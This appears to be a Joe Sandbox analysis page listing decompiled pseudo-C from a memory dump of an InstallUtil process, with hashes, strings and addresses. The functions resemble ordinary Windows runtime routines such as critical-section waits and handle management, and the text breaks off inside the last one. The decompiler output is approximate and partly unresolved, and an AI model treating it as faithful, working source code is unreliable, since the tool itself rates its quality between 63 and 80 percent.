Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e078f4a680ae2d0d6ed6553e1fe393d302df2a7cea93369c5503aa9099a8c965
Instruction ID: 953a121b8ce9631ee6c2de0e02270802e6e69e358f413528d829e20c3eedac63
Opcode Fuzzy Hash: e078f4a680ae2d0d6ed6553e1fe393d302df2a7cea93369c5503aa9099a8c965
Instruction Fuzzy Hash: 7C11A5713106469BCB11AF3DDC8596BB7E9FBC4618F000539EA4587A91EB20EC15D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 012C2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E012C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x13b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x13b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013097C0();
				}
				if( *0x13b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E012F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E012E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0135FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01309520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E012FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0131DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x13b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x13b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01309980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E012E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E012E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01347016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0135FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x13b5350;
							if(_t109 != 0x13b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0135FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01355720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x012c2d8a
0x012c2d8a
0x012c2d92
0x012c2d96
0x012c2d9e
0x012c2da0
0x012c2da3
0x012c2da5
0x012c2da8
0x012c2dab
0x012c2db2
0x0131f9aa
0x0131f9ab
0x0131f9ae
0x0131f9ae
0x012c2db8
0x012c2dc2
0x0131f9b9
0x0131f9be
0x0131f9bf
0x0131f9bf
0x012c2dcf
0x0131f9c9
0x012c2dd5
0x012c2dd5
0x012c2dd5
0x012c2dde
0x012c2de1
0x012c2e70
0x012c2e72
0x012c2e72
0x012c2de7
0x012c2deb
0x012c2e7c
0x012c2e83
0x012c2e85
0x012c2e8b
0x012c2e8d
0x012c2e92
0x012c2e92
0x012c2e85
0x012c2df1
0x012c2df7
0x012c2df9
0x012c2df9
0x012c2dfc
0x012c2dff
0x012c2e02
0x00000000
0x012c2e05
0x012c2e0c
0x0131f9d9
0x012c2e12
0x012c2e12
0x012c2e12
0x012c2e1a
0x0131f9e3
0x0131f9e9
0x0131f9f0
0x0131f9f6
0x0131f9f8
0x0131f9f8
0x0131f9f0
0x012c2e23
0x0131fa02
0x0131fa03
0x0131fa05
0x0131fa06
0x00000000
0x012c2e29
0x012c2e29
0x012c2e2e
0x012c2e34
0x012c2e3e
0x00000000
0x00000000
0x012c2e44
0x012c2e47
0x012c2e4d
0x00000000
0x00000000
0x012c2e4f
0x012c2e54
0x00000000
0x00000000
0x012c2e5a
0x012c2e5f
0x012c2e9a
0x012c2ea4
0x012c2ea5
0x012c2ea8
0x012c2eaf
0x012c2eb2
0x012c2eb5
0x0131fae9
0x0131faeb
0x0131faed
0x0131faef
0x0131faf7
0x0131faf8
0x0131fafd
0x0131faff
0x0131fb04
0x0131fb04
0x0131faff
0x012c2ec0
0x012c2ec4
0x012c2ec6
0x012c2ec8
0x0131fb14
0x0131fb18
0x0131fb1e
0x0131fb21
0x0131fb21
0x012c2ece
0x012c2ece
0x012c2ece
0x012c2ed7
0x012c2e61
0x012c2e63
0x0131fa6b
0x0131fa71
0x0131fa76
0x0131fa78
0x0131fa8a
0x0131fa7a
0x0131fa83
0x0131fa83
0x0131fa8f
0x0131fa91
0x0131fa97
0x0131fa9d
0x0131faa4
0x0131faaa
0x0131faaf
0x0131fab1
0x0131fac3
0x0131fab3
0x0131fabc
0x0131fabc
0x0131fac8
0x0131facb
0x0131fadf
0x0131fadf
0x0131facb
0x0131faa4
0x0131fa91
0x012c2e6f
0x012c2e6f
0x012c2e5f
0x0131fa13
0x0131fa15
0x0131fa17
0x0131fa1f
0x0131fa21
0x0131fa22
0x0131fa25
0x0131fa28
0x0131fa2f
0x0131fa2f
0x0131fa2a
0x0131fa2a
0x0131fa2a
0x0131fa31
0x0131fa34
0x0131fa36
0x0131fa3c
0x0131fa3e
0x0131fa41
0x0131fa43
0x0131fa45
0x0131fa45
0x0131fa41
0x0131fa3c
0x0131fa4a
0x0131fa4f
0x0131fa51
0x0131fa53
0x0131fa56
0x0131fa5b
0x0131fa5e
0x00000000
0x0131fa5e
0x012c2e23

Strings

RTL: Re-Waiting, xrefs: 0131FA4A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
Instruction ID: 9c65ecb2e4eae6f6433078a764e743ad6f6e8d3614b5b132e783fa85b6ca4bbd
Opcode Fuzzy Hash: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
Instruction Fuzzy Hash: AB613731A10645DFEB36DF6CC880B7E7BE9EB44B18F140269DB15A72C1CB74A905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C52A5 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E012DEEF0(0x13b79a0);
					_t104 =  *0x13b8210; // 0xe62c70
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E012DEB70(_t93, 0x13b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01309890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E012DEEF0(0x13b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E012DEB70(0, 0x13b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xe62c7d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E012FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E012DEEF0(0x13b79a0);
									__eflags =  *0x13b8210 - _t104; // 0xe62c70
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x13b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01344888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E012DEB70(_t95, 0x13b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013095D0();
											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013095D0();
											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E012DEB70(_t93, 0x13b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E013095D0();
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E013095D0();
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E012FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x012c52a5
0x012c52ad
0x012c52b0
0x012c52b3
0x012c52b7
0x012c52ba
0x012c52bf
0x012c52c4
0x012c52cc
0x00000000
0x00000000
0x012c52ce
0x012c52d9
0x012c52dd
0x012c52e7
0x012c52f7
0x012c52f9
0x012c52fd
0x01320dcf
0x01320dd5
0x01320dd6
0x01320dd7
0x01320dd8
0x01320dd9
0x01320dde
0x01320ddf
0x01320de0
0x01320de1
0x01320de2
0x01320de5
0x01320dea
0x01320dec
0x01320f60
0x01320f64
0x01320f70
0x01320f76
0x01320f79
0x01320f79
0x00000000
0x01320f64
0x01320df2
0x01320df7
0x01320e04
0x01320e0d
0x01320e0d
0x01320e10
0x01320e1a
0x01320e1c
0x01320e4c
0x01320e52
0x01320e61
0x01320e67
0x01320e6b
0x01320e70
0x01320e76
0x01320ed7
0x01320edc
0x01320ee0
0x01320ee6
0x01320eea
0x01320eed
0x01320ef0
0x01320ef3
0x01320ef6
0x01320ef9
0x01320efe
0x01320f01
0x01320f01
0x01320f0b
0x01320f12
0x01320f16
0x01320f18
0x01320f1b
0x01320f2c
0x01320f31
0x01320f31
0x01320f35
0x01320f39
0x01320f3a
0x01320f3c
0x01320f3f
0x01320f50
0x01320f55
0x01320f55
0x01320f59
0x012c52eb
0x012c52f1
0x012c52f1
0x01320e7d
0x01320e84
0x01320e88
0x01320e8a
0x01320e8d
0x01320e9e
0x01320ea3
0x01320ea3
0x01320ea7
0x01320eaf
0x01320eb3
0x01320eb9
0x01320eb9
0x01320ebc
0x01320ecd
0x01320ecd
0x00000000
0x01320eb3
0x01320e21
0x01320e2b
0x01320e2f
0x01320e30
0x01320e3a
0x01320e3f
0x01320e41
0x00000000
0x00000000
0x01320e47
0x00000000
0x01320e47
0x01320df9
0x01320dfe
0x00000000
0x00000000
0x00000000
0x01320dfe
0x012c5303
0x012c5307
0x00000000
0x012c5309
0x00000000
0x012c5309
0x012c5307
0x012c52e9
0x012c52e9
0x00000000
0x012c52e9
0x012c530e
0x00000000

Strings

p,, xrefs: 012C52C4, 01320E70, 01320EE0

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: p,
API String ID: 0-2703748495
Opcode ID: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
Instruction ID: 1034b555865b5985450651cecb671459183fde6e29033fed66489e4d47445513
Opcode Fuzzy Hash: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
Instruction Fuzzy Hash: 6C51F031255742ABD325EF28C841B27BBE5FF90B18F14091EF69987691E7B0F844C792

Uniqueness

Uniqueness Score: -1.00%

Function 01390EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01390EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0138FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01391074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01309730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0138A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0138A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x13b8b04 >> 0x14) + (_v44 -  *0x13b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E012E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0138138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E012E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0137FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x13b8724 & 0x00000008) != 0) {
						E013852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013915B5(0x13b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01390eb7
0x01390eb9
0x01390ec0
0x01390ec2
0x01390ecd
0x0139105b
0x0139105b
0x01391061
0x01391066
0x01391066
0x0139106b
0x01391073
0x01391073
0x01390ed3
0x01390ed6
0x01390edc
0x01390ee0
0x01390ee7
0x01390ef0
0x01390ef5
0x01390efa
0x01390efc
0x01390efd
0x01390f03
0x01390f04
0x01390f06
0x01390f07
0x01390f09
0x01390f0e
0x01390f14
0x01390f23
0x01390f2d
0x01390f34
0x01390f34
0x01390f14
0x01390f52
0x00000000
0x00000000
0x01390f58
0x01390f73
0x01390f74
0x01390f79
0x01390f7d
0x01390f80
0x01390f86
0x01390fab
0x01390fb5
0x01390fc6
0x01390fd1
0x01390fe3
0x01390fd3
0x01390fdc
0x01390fdc
0x01390feb
0x01391009
0x01391009
0x01391015
0x01391027
0x01391017
0x01391020
0x01391020
0x0139102f
0x0139103c
0x0139103c
0x01391048
0x01391050
0x01391050
0x01391055
0x00000000
0x01391055
0x01390f88
0x01390f9e
0x01390fa2
0x01390fa9
0x00000000
0x00000000
0x00000000
0x01390fa9
0x00000000

Strings

`, xrefs: 01390F16

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
Instruction ID: c93c79fe4b9393e8103518899daf208eb72a4ba90229758b42154777861d537a
Opcode Fuzzy Hash: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
Instruction Fuzzy Hash: A751B2713043429FEB25DF28D984B1BBBE9EBC4718F04092DFA9697290D771E909C762

Uniqueness

Uniqueness Score: -1.00%

Function 012FF0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E012E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01309830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01309990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E013095D0();
							goto L11;
						} else {
							_t109 = L012E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0130F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E013095D0();
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x012ff0d3
0x012ff0d9
0x012ff0e0
0x012ff0e7
0x012ff0f2
0x012ff0f4
0x012ff0f8
0x012ff100
0x012ff108
0x012ff10d
0x012ff115
0x012ff116
0x012ff11f
0x012ff123
0x012ff124
0x012ff12c
0x012ff130
0x012ff134
0x012ff13d
0x012ff144
0x012ff14b
0x012ff152
0x0133bab0
0x0133bab0
0x012ff158
0x012ff158
0x012ff15a
0x012ff160
0x012ff165
0x012ff166
0x012ff16f
0x012ff173
0x0133baa7
0x0133baa7
0x0133baab
0x00000000
0x012ff179
0x012ff18d
0x012ff191
0x0133baa2
0x00000000
0x012ff197
0x012ff19b
0x012ff1a2
0x012ff1a9
0x012ff1af
0x012ff1b2
0x012ff1b6
0x012ff1b9
0x012ff1c4
0x012ff1d8
0x012ff1df
0x012ff1e3
0x012ff1eb
0x012ff1ee
0x012ff1f4
0x012ff20f
0x0133bab7
0x0133babb
0x0133bacc
0x0133bad1
0x012ff215
0x012ff218
0x012ff226
0x012ff22b
0x00000000
0x012ff22b
0x012ff1f6
0x012ff1f6
0x012ff1f9
0x012ff1fb
0x012ff1fb
0x012ff1f4
0x012ff191
0x012ff173
0x012ff152
0x012ff203

Strings

@, xrefs: 012FF124

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 1d277d87cd824bed432633d2e8df5c4e6b0de07c5a4184816d40f47b7eccf36e
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 6B517A72514711AFD321DF29C841A6BBBF8FF88714F00892EFA9587690E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01343540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01343540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x13bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
